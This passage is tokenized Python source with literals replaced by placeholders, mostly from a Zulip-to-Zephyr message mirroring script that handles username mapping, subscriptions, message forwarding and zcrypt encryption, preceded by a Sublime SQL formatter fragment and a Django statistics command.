<EOL> return None <EOL> def replace_region_with_formatted_sql ( self , edit , region ) : <EOL> selected_text = self . view . substr ( region ) <EOL> foramtted_text = self . format_sql ( selected_text ) <EOL> self . view . replace ( edit , region , foramtted_text ) <EOL> def run ( self , edit ) : <EOL> window = self . view . window ( ) <EOL> view = window . active_view ( ) <EOL> for region in self . view . sel ( ) : <EOL> if region . empty ( ) : <EOL> selection = sublime . Region ( <NUM_LIT:0> , self . view . size ( ) ) <EOL> self . replace_region_with_formatted_sql ( edit , selection ) <EOL> self . view . set_syntax_file ( "<STR_LIT>" ) <EOL> else : <EOL> self . replace_region_with_formatted_sql ( edit , region ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> import datetime <EOL> import pytz <EOL> from optparse import make_option <EOL> from django . core . management . base import BaseCommand <EOL> from zerver . lib . statistics import activity_averages_during_day <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> option_list = BaseCommand . option_list + ( make_option ( '<STR_LIT>' , default = None , action = '<STR_LIT:store>' , <EOL> help = "<STR_LIT>" ) , ) <EOL> def handle ( self , * args , ** options ) : <EOL> if options [ "<STR_LIT:date>" ] is None : <EOL> date = datetime . datetime . now ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> else : <EOL> date = datetime . datetime . strptime ( options [ "<STR_LIT:date>" ] , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , date ) <EOL> print ( activity_averages_during_day ( date ) ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from __future__ import absolute_import <EOL> from typing import Any , List <EOL> import sys <EOL> from six . moves import map <EOL> from six . moves import range <EOL> try : <EOL> import simplejson <EOL> except ImportError : <EOL> import json as simplejson <EOL> import re <EOL> import time <EOL> import subprocess <EOL> import optparse <EOL> import os <EOL> import datetime <EOL> import textwrap <EOL> import signal <EOL> import logging <EOL> import hashlib <EOL> import tempfile <EOL> import select <EOL> DEFAULT_SITE = "<STR_LIT>" <EOL> class States ( object ) : <EOL> Startup , ZulipToZephyr , ZephyrToZulip , ChildSending = list ( range ( <NUM_LIT:4> ) ) <EOL> CURRENT_STATE = States . Startup <EOL> logger = None <EOL> def to_zulip_username ( zephyr_username ) : <EOL> if "<STR_LIT:@>" in zephyr_username : <EOL> ( user , realm ) = zephyr_username . split ( "<STR_LIT:@>" ) <EOL> else : <EOL> ( user , realm ) = ( zephyr_username , "<STR_LIT>" ) <EOL> if realm . upper ( ) == "<STR_LIT>" : <EOL> if user . lower ( ) == '<STR_LIT>' : <EOL> user = '<STR_LIT>' <EOL> return user . lower ( ) + "<STR_LIT>" <EOL> return user . lower ( ) + "<STR_LIT:|>" + realm . upper ( ) + "<STR_LIT>" <EOL> def to_zephyr_username ( zulip_username ) : <EOL> ( user , realm ) = zulip_username . split ( "<STR_LIT:@>" ) <EOL> if "<STR_LIT:|>" not in user : <EOL> if user . lower ( ) == '<STR_LIT>' : <EOL> user = '<STR_LIT>' <EOL> return user . lower ( ) + "<STR_LIT>" <EOL> match_user = re . match ( r'<STR_LIT>' , user ) <EOL> if not match_user : <EOL> raise Exception ( "<STR_LIT>" % ( zulip_username , ) ) <EOL> return match_user . group ( <NUM_LIT:1> ) . lower ( ) + "<STR_LIT:@>" + match_user . group ( <NUM_LIT:2> ) . upper ( ) <EOL> def different_paragraph ( line , next_line ) : <EOL> words = next_line . 
split ( ) <EOL> return ( len ( line + "<STR_LIT:U+0020>" + words [ <NUM_LIT:0> ] ) < len ( next_line ) * <NUM_LIT> or <EOL> len ( line + "<STR_LIT:U+0020>" + words [ <NUM_LIT:0> ] ) < <NUM_LIT:50> or <EOL> len ( line ) < len ( words [ <NUM_LIT:0> ] ) ) <EOL> def unwrap_lines ( body ) : <EOL> lines = body . split ( "<STR_LIT:\n>" ) <EOL> result = "<STR_LIT>" <EOL> previous_line = lines [ <NUM_LIT:0> ] <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> line = line . rstrip ( ) <EOL> if ( re . match ( r'<STR_LIT>' , line , flags = re . UNICODE ) <EOL> and re . match ( r'<STR_LIT>' , previous_line , flags = re . UNICODE ) ) : <EOL> result += previous_line + "<STR_LIT:\n>" <EOL> elif ( line == "<STR_LIT>" or <EOL> previous_line == "<STR_LIT>" or <EOL> re . match ( r'<STR_LIT>' , line , flags = re . UNICODE ) or <EOL> different_paragraph ( previous_line , line ) ) : <EOL> result += previous_line + "<STR_LIT>" <EOL> else : <EOL> result += previous_line + "<STR_LIT:U+0020>" <EOL> previous_line = line <EOL> result += previous_line <EOL> return result <EOL> def send_zulip ( zeph ) : <EOL> message = { } <EOL> if options . forward_class_messages : <EOL> message [ "<STR_LIT>" ] = "<STR_LIT:yes>" <EOL> message [ '<STR_LIT:type>' ] = zeph [ '<STR_LIT:type>' ] <EOL> message [ '<STR_LIT:time>' ] = zeph [ '<STR_LIT:time>' ] <EOL> message [ '<STR_LIT>' ] = to_zulip_username ( zeph [ '<STR_LIT>' ] ) <EOL> if "<STR_LIT>" in zeph : <EOL> message [ "<STR_LIT>" ] = zeph [ "<STR_LIT>" ] [ : <NUM_LIT> ] <EOL> if zeph [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> if zeph [ "<STR_LIT>" ] == "<STR_LIT:message>" : <EOL> message [ '<STR_LIT:to>' ] = zeph [ '<STR_LIT>' ] . lower ( ) <EOL> message [ '<STR_LIT>' ] = "<STR_LIT>" % ( zeph [ '<STR_LIT>' ] , ) <EOL> elif zeph [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> message [ '<STR_LIT:to>' ] = zeph [ '<STR_LIT>' ] . 
lower ( ) <EOL> message [ '<STR_LIT>' ] = "<STR_LIT>" % ( zeph [ '<STR_LIT>' ] , ) <EOL> else : <EOL> message [ "<STR_LIT:to>" ] = zeph [ "<STR_LIT>" ] <EOL> else : <EOL> message [ "<STR_LIT:to>" ] = zeph [ "<STR_LIT>" ] <EOL> message [ '<STR_LIT:content>' ] = unwrap_lines ( zeph [ '<STR_LIT:content>' ] ) <EOL> if options . test_mode and options . site == DEFAULT_SITE : <EOL> logger . debug ( "<STR_LIT>" % ( str ( message ) , ) ) <EOL> return { '<STR_LIT:result>' : "<STR_LIT:success>" } <EOL> return zulip_client . send_message ( message ) <EOL> def send_error_zulip ( error_msg ) : <EOL> message = { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : zulip_account_email , <EOL> "<STR_LIT:to>" : zulip_account_email , <EOL> "<STR_LIT:content>" : error_msg , <EOL> } <EOL> zulip_client . send_message ( message ) <EOL> current_zephyr_subs = set ( ) <EOL> def zephyr_bulk_subscribe ( subs ) : <EOL> try : <EOL> zephyr . _z . subAll ( subs ) <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> logger . warning ( "<STR_LIT>" % ( [ cls for cls , instance , recipient in subs ] , ) ) <EOL> return <EOL> try : <EOL> actual_zephyr_subs = [ cls for ( cls , _ , _ ) in zephyr . _z . getSubscriptions ( ) ] <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> return <EOL> for ( cls , instance , recipient ) in subs : <EOL> if cls not in actual_zephyr_subs : <EOL> logger . error ( "<STR_LIT>" % ( cls , ) ) <EOL> try : <EOL> zephyr . _z . sub ( cls , instance , recipient ) <EOL> except IOError : <EOL> pass <EOL> else : <EOL> current_zephyr_subs . add ( cls ) <EOL> def update_subscriptions ( ) : <EOL> try : <EOL> f = open ( options . stream_file_path , "<STR_LIT:r>" ) <EOL> public_streams = simplejson . loads ( f . read ( ) ) <EOL> f . close ( ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> return <EOL> classes_to_subscribe = set ( ) <EOL> for stream in public_streams : <EOL> zephyr_class = stream . 
encode ( "<STR_LIT:utf-8>" ) <EOL> if ( options . shard is not None and <EOL> not hashlib . sha1 ( zephyr_class ) . hexdigest ( ) . startswith ( options . shard ) ) : <EOL> continue <EOL> if zephyr_class in current_zephyr_subs : <EOL> continue <EOL> classes_to_subscribe . add ( ( zephyr_class , "<STR_LIT:*>" , "<STR_LIT:*>" ) ) <EOL> if len ( classes_to_subscribe ) > <NUM_LIT:0> : <EOL> zephyr_bulk_subscribe ( list ( classes_to_subscribe ) ) <EOL> def maybe_kill_child ( ) : <EOL> try : <EOL> if child_pid is not None : <EOL> os . kill ( child_pid , signal . SIGTERM ) <EOL> except OSError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def maybe_restart_mirroring_script ( ) : <EOL> if os . stat ( os . path . join ( options . root_path , "<STR_LIT>" , "<STR_LIT>" ) ) . st_mtime > start_time or ( ( options . user == "<STR_LIT>" or options . user == "<STR_LIT>" ) and <EOL> os . stat ( os . path . join ( options . root_path , "<STR_LIT>" , "<STR_LIT>" ) ) . st_mtime > start_time ) : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> logger . warning ( "<STR_LIT>" ) <EOL> maybe_kill_child ( ) <EOL> try : <EOL> zephyr . _z . cancelSubs ( ) <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> os . execvp ( os . path . join ( options . root_path , "<STR_LIT>" , "<STR_LIT>" ) , sys . argv ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def process_loop ( log ) : <EOL> restart_check_count = <NUM_LIT:0> <EOL> last_check_time = time . time ( ) <EOL> while True : <EOL> select . select ( [ zephyr . _z . getFD ( ) ] , [ ] , [ ] , <NUM_LIT:15> ) <EOL> try : <EOL> while True : <EOL> notice = zephyr . receive ( block = False ) <EOL> if notice is None : <EOL> break <EOL> try : <EOL> process_notice ( notice , log ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> except Exception : <EOL> logger . 
exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> continue <EOL> if time . time ( ) - last_check_time > <NUM_LIT:15> : <EOL> last_check_time = time . time ( ) <EOL> try : <EOL> maybe_restart_mirroring_script ( ) <EOL> if restart_check_count > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" ) <EOL> restart_check_count = <NUM_LIT:0> <EOL> except Exception : <EOL> if restart_check_count < <NUM_LIT:5> : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> restart_check_count += <NUM_LIT:1> <EOL> if options . forward_class_messages : <EOL> try : <EOL> update_subscriptions ( ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def parse_zephyr_body ( zephyr_data ) : <EOL> try : <EOL> ( zsig , body ) = zephyr_data . split ( "<STR_LIT:\x00>" , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> ( zsig , body ) = ( "<STR_LIT>" , zephyr_data ) <EOL> return ( zsig , body ) <EOL> def parse_crypt_table ( zephyr_class , instance ) : <EOL> try : <EOL> crypt_table = open ( os . path . join ( os . environ [ "<STR_LIT>" ] , "<STR_LIT>" ) ) <EOL> except IOError : <EOL> return None <EOL> for line in crypt_table . readlines ( ) : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> match = re . match ( "<STR_LIT>" , line ) <EOL> if match is None : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> continue <EOL> groups = match . groupdict ( ) <EOL> if groups [ '<STR_LIT:class>' ] . lower ( ) == zephyr_class and '<STR_LIT>' in groups and groups . get ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> return groups [ "<STR_LIT>" ] <EOL> return None <EOL> def decrypt_zephyr ( zephyr_class , instance , body ) : <EOL> keypath = parse_crypt_table ( zephyr_class , instance ) <EOL> if keypath is None : <EOL> return body <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_DFL ) <EOL> p = subprocess . 
Popen ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> keypath ] , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> decrypted , _ = p . communicate ( input = body ) <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_IGN ) <EOL> return decrypted <EOL> def process_notice ( notice , log ) : <EOL> ( zsig , body ) = parse_zephyr_body ( notice . message ) <EOL> is_personal = False <EOL> is_huddle = False <EOL> if notice . opcode == "<STR_LIT>" : <EOL> return <EOL> zephyr_class = notice . cls . lower ( ) <EOL> if zephyr_class == options . nagios_class : <EOL> with open ( options . nagios_path , "<STR_LIT:w>" ) as f : <EOL> f . write ( "<STR_LIT>" ) <EOL> return <EOL> if notice . recipient != "<STR_LIT>" : <EOL> is_personal = True <EOL> if is_personal and not options . forward_personals : <EOL> return <EOL> if ( zephyr_class not in current_zephyr_subs ) and not is_personal : <EOL> logger . debug ( "<STR_LIT>" % <EOL> ( zephyr_class , notice . instance , is_personal ) ) <EOL> return <EOL> if notice . format . startswith ( "<STR_LIT>" ) or notice . format . endswith ( "<STR_LIT>" ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> return <EOL> if ( zephyr_class == "<STR_LIT>" and notice . instance . lower ( ) == "<STR_LIT>" and is_personal and <EOL> not options . forward_mail_zephyrs ) : <EOL> return <EOL> if is_personal : <EOL> if body . startswith ( "<STR_LIT>" ) : <EOL> is_huddle = True <EOL> huddle_recipients = [ to_zulip_username ( x . strip ( ) ) for x in <EOL> body . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:0> ] [ <NUM_LIT:4> : ] . split ( ) ] <EOL> if notice . sender not in huddle_recipients : <EOL> huddle_recipients . append ( to_zulip_username ( notice . sender ) ) <EOL> body = body . split ( "<STR_LIT:\n>" , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> if options . 
forward_class_messages and notice . opcode . lower ( ) == "<STR_LIT>" : <EOL> body = decrypt_zephyr ( zephyr_class , notice . instance . lower ( ) , body ) <EOL> zeph = { '<STR_LIT:time>' : str ( notice . time ) , <EOL> '<STR_LIT>' : notice . sender , <EOL> '<STR_LIT>' : zsig , <EOL> '<STR_LIT:content>' : body } <EOL> if is_huddle : <EOL> zeph [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> zeph [ '<STR_LIT>' ] = huddle_recipients <EOL> elif is_personal : <EOL> zeph [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> zeph [ '<STR_LIT>' ] = to_zulip_username ( notice . recipient ) <EOL> else : <EOL> zeph [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> zeph [ '<STR_LIT>' ] = zephyr_class <EOL> if notice . instance . strip ( ) != "<STR_LIT>" : <EOL> zeph [ '<STR_LIT>' ] = notice . instance <EOL> else : <EOL> zeph [ "<STR_LIT>" ] = '<STR_LIT>' % ( notice . instance , ) <EOL> if is_personal : <EOL> if notice . cls . lower ( ) != "<STR_LIT:message>" and notice . instance . lower != "<STR_LIT>" : <EOL> heading = "<STR_LIT>" % ( notice . cls , notice . instance ) <EOL> elif notice . cls . lower ( ) != "<STR_LIT:message>" : <EOL> heading = "<STR_LIT>" % ( notice . cls , ) <EOL> elif notice . instance . lower ( ) != "<STR_LIT>" : <EOL> heading = "<STR_LIT>" % ( notice . instance , ) <EOL> else : <EOL> heading = "<STR_LIT>" <EOL> zeph [ "<STR_LIT:content>" ] = heading + zeph [ "<STR_LIT:content>" ] <EOL> zeph = decode_unicode_byte_strings ( zeph ) <EOL> logger . info ( "<STR_LIT>" % <EOL> ( zephyr_class , notice . instance , notice . sender ) ) <EOL> if log is not None : <EOL> log . write ( simplejson . dumps ( zeph ) + '<STR_LIT:\n>' ) <EOL> log . flush ( ) <EOL> if os . fork ( ) == <NUM_LIT:0> : <EOL> global CURRENT_STATE <EOL> CURRENT_STATE = States . ChildSending <EOL> try : <EOL> res = send_zulip ( zeph ) <EOL> if res . get ( "<STR_LIT:result>" ) != "<STR_LIT:success>" : <EOL> logger . error ( "<STR_LIT>" % ( zeph , res ) ) <EOL> except Exception : <EOL> logger . 
exception ( "<STR_LIT>" ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> def decode_unicode_byte_strings ( zeph ) : <EOL> for field in zeph . keys ( ) : <EOL> if isinstance ( zeph [ field ] , str ) : <EOL> try : <EOL> decoded = zeph [ field ] . decode ( "<STR_LIT:utf-8>" ) <EOL> except Exception : <EOL> decoded = zeph [ field ] . decode ( "<STR_LIT>" ) <EOL> zeph [ field ] = decoded <EOL> return zeph <EOL> def quit_failed_initialization ( message ) : <EOL> logger . error ( message ) <EOL> maybe_kill_child ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def zephyr_init_autoretry ( ) : <EOL> backoff = zulip . RandomExponentialBackoff ( ) <EOL> while backoff . keep_going ( ) : <EOL> try : <EOL> zephyr . init ( ) <EOL> backoff . succeed ( ) <EOL> return <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff . fail ( ) <EOL> quit_failed_initialization ( "<STR_LIT>" ) <EOL> def zephyr_load_session_autoretry ( session_path ) : <EOL> backoff = zulip . RandomExponentialBackoff ( ) <EOL> while backoff . keep_going ( ) : <EOL> try : <EOL> session = open ( session_path , "<STR_LIT:r>" ) . read ( ) <EOL> zephyr . _z . initialize ( ) <EOL> zephyr . _z . load_session ( session ) <EOL> zephyr . __inited = True <EOL> return <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff . fail ( ) <EOL> quit_failed_initialization ( "<STR_LIT>" ) <EOL> def zephyr_subscribe_autoretry ( sub ) : <EOL> backoff = zulip . RandomExponentialBackoff ( ) <EOL> while backoff . keep_going ( ) : <EOL> try : <EOL> zephyr . Subscriptions ( ) . add ( sub ) <EOL> backoff . succeed ( ) <EOL> return <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff . fail ( ) <EOL> quit_failed_initialization ( "<STR_LIT>" ) <EOL> def zephyr_to_zulip ( options ) : <EOL> if options . use_sessions and os . path . exists ( options . session_path ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> zephyr_load_session_autoretry ( options . 
session_path ) <EOL> else : <EOL> zephyr_init_autoretry ( ) <EOL> if options . forward_class_messages : <EOL> update_subscriptions ( ) <EOL> if options . forward_personals : <EOL> zephyr_subscribe_autoretry ( ( "<STR_LIT:message>" , "<STR_LIT:*>" , "<STR_LIT>" ) ) <EOL> zephyr_subscribe_autoretry ( ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if options . nagios_class : <EOL> zephyr_subscribe_autoretry ( ( options . nagios_class , "<STR_LIT:*>" , "<STR_LIT:*>" ) ) <EOL> if options . use_sessions : <EOL> open ( options . session_path , "<STR_LIT:w>" ) . write ( zephyr . _z . dump_session ( ) ) <EOL> if options . logs_to_resend is not None : <EOL> with open ( options . logs_to_resend , '<STR_LIT:r>' ) as log : <EOL> for ln in log : <EOL> try : <EOL> zeph = simplejson . loads ( ln ) <EOL> zeph = decode_unicode_byte_strings ( zeph ) <EOL> if "<STR_LIT:class>" in zeph : <EOL> zeph [ "<STR_LIT>" ] = zeph [ "<STR_LIT:class>" ] <EOL> if "<STR_LIT>" in zeph : <EOL> zeph [ "<STR_LIT>" ] = zeph [ "<STR_LIT>" ] <EOL> logger . info ( "<STR_LIT>" % <EOL> ( zeph . get ( '<STR_LIT>' , zeph . get ( '<STR_LIT>' ) ) , <EOL> zeph [ '<STR_LIT>' ] ) ) <EOL> send_zulip ( zeph ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> if options . resend_log_path is not None : <EOL> with open ( options . resend_log_path , '<STR_LIT:a>' ) as log : <EOL> process_loop ( log ) <EOL> else : <EOL> process_loop ( None ) <EOL> def send_zephyr ( zwrite_args , content ) : <EOL> p = subprocess . Popen ( zwrite_args , stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> stdout , stderr = p . communicate ( input = content . encode ( "<STR_LIT:utf-8>" ) ) <EOL> if p . returncode : <EOL> logger . error ( "<STR_LIT>" % ( <EOL> "<STR_LIT:U+0020>" . join ( zwrite_args ) , p . returncode , ) ) <EOL> if stdout : <EOL> logger . 
info ( "<STR_LIT>" + stdout ) <EOL> elif stderr : <EOL> logger . warning ( "<STR_LIT>" % ( <EOL> "<STR_LIT:U+0020>" . join ( zwrite_args ) , ) ) <EOL> if stderr : <EOL> logger . warning ( "<STR_LIT>" + stderr ) <EOL> return ( p . returncode , stderr ) <EOL> def send_authed_zephyr ( zwrite_args , content ) : <EOL> return send_zephyr ( zwrite_args , content ) <EOL> def send_unauthed_zephyr ( zwrite_args , content ) : <EOL> return send_zephyr ( zwrite_args + [ "<STR_LIT>" ] , content ) <EOL> def zcrypt_encrypt_content ( zephyr_class , instance , content ) : <EOL> keypath = parse_crypt_table ( zephyr_class , instance ) <EOL> if keypath is None : <EOL> return None <EOL> p = subprocess . Popen ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> keypath ] , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> encrypted , _ = p . communicate ( input = content ) <EOL> return encrypted <EOL> def forward_to_zephyr ( message ) : <EOL> support_heading = "<STR_LIT>" <EOL> support_closing = """<STR_LIT>""" <EOL> wrapper = textwrap . TextWrapper ( break_long_words = False , break_on_hyphens = False ) <EOL> wrapped_content = "<STR_LIT:\n>" . join ( "<STR_LIT:\n>" . join ( wrapper . wrap ( line ) ) <EOL> for line in message [ "<STR_LIT:content>" ] . replace ( "<STR_LIT:@>" , "<STR_LIT>" ) . split ( "<STR_LIT:\n>" ) ) <EOL> zwrite_args = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , message [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> if message [ '<STR_LIT:type>' ] == "<STR_LIT>" and zulip_account_email == "<STR_LIT>" : <EOL> zwrite_args . 
extend ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if message [ '<STR_LIT:type>' ] == "<STR_LIT>" : <EOL> zephyr_class = message [ "<STR_LIT>" ] <EOL> instance = message [ "<STR_LIT>" ] <EOL> match_whitespace_instance = re . match ( r'<STR_LIT>' , instance ) <EOL> if match_whitespace_instance : <EOL> instance = match_whitespace_instance . group ( <NUM_LIT:1> ) <EOL> elif ( instance == "<STR_LIT>" % ( zephyr_class , ) or <EOL> instance == "<STR_LIT>" % ( zephyr_class , ) ) : <EOL> if instance . startswith ( "<STR_LIT:test>" ) : <EOL> instance = zephyr_class <EOL> zephyr_class = "<STR_LIT>" <EOL> else : <EOL> instance = zephyr_class <EOL> zephyr_class = "<STR_LIT:message>" <EOL> zwrite_args . extend ( [ "<STR_LIT:-c>" , zephyr_class , "<STR_LIT>" , instance ] ) <EOL> logger . info ( "<STR_LIT>" % ( zephyr_class , instance ) ) <EOL> elif message [ '<STR_LIT:type>' ] == "<STR_LIT>" : <EOL> if len ( message [ '<STR_LIT>' ] ) == <NUM_LIT:1> : <EOL> recipient = to_zephyr_username ( message [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT:email>" ] ) <EOL> recipients = [ recipient ] <EOL> elif len ( message [ '<STR_LIT>' ] ) == <NUM_LIT:2> : <EOL> recipient = "<STR_LIT>" <EOL> for r in message [ "<STR_LIT>" ] : <EOL> if r [ "<STR_LIT:email>" ] . lower ( ) != zulip_account_email . lower ( ) : <EOL> recipient = to_zephyr_username ( r [ "<STR_LIT:email>" ] ) <EOL> break <EOL> recipients = [ recipient ] <EOL> else : <EOL> zwrite_args . extend ( [ "<STR_LIT>" ] ) <EOL> recipients = [ to_zephyr_username ( user [ "<STR_LIT:email>" ] ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for user in message [ "<STR_LIT>" ] ] <EOL> logger . info ( "<STR_LIT>" % ( recipients , ) ) <EOL> zwrite_args . extend ( recipients ) <EOL> if message . 
get ( "<STR_LIT>" ) : <EOL> result = zcrypt_encrypt_content ( zephyr_class , instance , wrapped_content ) <EOL> if result is None : <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , support_closing ) ) <EOL> wrapped_content = result <EOL> zwrite_args . extend ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if options . test_mode : <EOL> logger . debug ( "<STR_LIT>" % <EOL> ( zwrite_args , wrapped_content . encode ( "<STR_LIT:utf-8>" ) ) ) <EOL> return <EOL> ( code , stderr ) = send_authed_zephyr ( zwrite_args , wrapped_content ) <EOL> if code == <NUM_LIT:0> and stderr == "<STR_LIT>" : <EOL> return <EOL> elif code == <NUM_LIT:0> : <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , stderr , support_closing ) ) <EOL> elif code != <NUM_LIT:0> and ( stderr . startswith ( "<STR_LIT>" ) or <EOL> stderr . startswith ( "<STR_LIT>" ) ) : <EOL> ( code , stderr ) = send_unauthed_zephyr ( zwrite_args , wrapped_content ) <EOL> if code == <NUM_LIT:0> : <EOL> if options . ignore_expired_tickets : <EOL> return <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , support_closing ) ) <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , stderr , support_closing ) ) <EOL> def maybe_forward_to_zephyr ( message ) : <EOL> if ( message [ "<STR_LIT>" ] == zulip_account_email ) : <EOL> if not ( ( message [ "<STR_LIT:type>" ] == "<STR_LIT>" ) or <EOL> ( message [ "<STR_LIT:type>" ] == "<STR_LIT>" and <EOL> False not in [ u [ "<STR_LIT:email>" ] . lower ( ) . endswith ( "<STR_LIT>" ) for u in <EOL> message [ "<STR_LIT>" ] ] ) ) : <EOL> return <EOL> timestamp_now = datetime . datetime . now ( ) . strftime ( "<STR_LIT:%s>" ) <EOL> if float ( message [ "<STR_LIT>" ] ) < float ( timestamp_now ) - <NUM_LIT:15> : <EOL> logger . warning ( "<STR_LIT>" % <EOL> ( message [ "<STR_LIT>" ] , timestamp_now ) ) <EOL> return <EOL> try : <EOL> forward_to_zephyr ( message ) <EOL> except Exception : <EOL> logger . 
exception ( "<STR_LIT>" ) <EOL> def zulip_to_zephyr ( options ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> zulip_client . call_on_each_message ( maybe_forward_to_zephyr ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def subscribed_to_mail_messages ( ) : <EOL> stored_result = os . environ . get ( "<STR_LIT>" ) <EOL> if stored_result is not None : <EOL> return stored_result == "<STR_LIT:True>" <EOL> for ( cls , instance , recipient ) in parse_zephyr_subs ( verbose = False ) : <EOL> if ( cls . lower ( ) == "<STR_LIT>" and instance . lower ( ) == "<STR_LIT>" ) : <EOL> os . environ [ "<STR_LIT>" ] = "<STR_LIT:True>" <EOL> return True <EOL> os . environ [ "<STR_LIT>" ] = "<STR_LIT:False>" <EOL> return False <EOL> def add_zulip_subscriptions ( verbose ) : <EOL> zephyr_subscriptions = set ( ) <EOL> skipped = set ( ) <EOL> for ( cls , instance , recipient ) in parse_zephyr_subs ( verbose = verbose ) : <EOL> if cls . lower ( ) == "<STR_LIT:message>" : <EOL> if recipient != "<STR_LIT:*>" : <EOL> continue <EOL> if instance == "<STR_LIT:*>" : <EOL> if recipient == "<STR_LIT:*>" : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> zephyr_subscriptions . add ( instance ) <EOL> continue <EOL> elif cls . lower ( ) == "<STR_LIT>" and instance . lower ( ) == "<STR_LIT>" : <EOL> continue <EOL> elif len ( cls ) > <NUM_LIT> : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> elif instance != "<STR_LIT:*>" : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> elif recipient != "<STR_LIT:*>" : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> zephyr_subscriptions . add ( cls ) <EOL> if len ( zephyr_subscriptions ) != <NUM_LIT:0> : <EOL> res = zulip_client . 
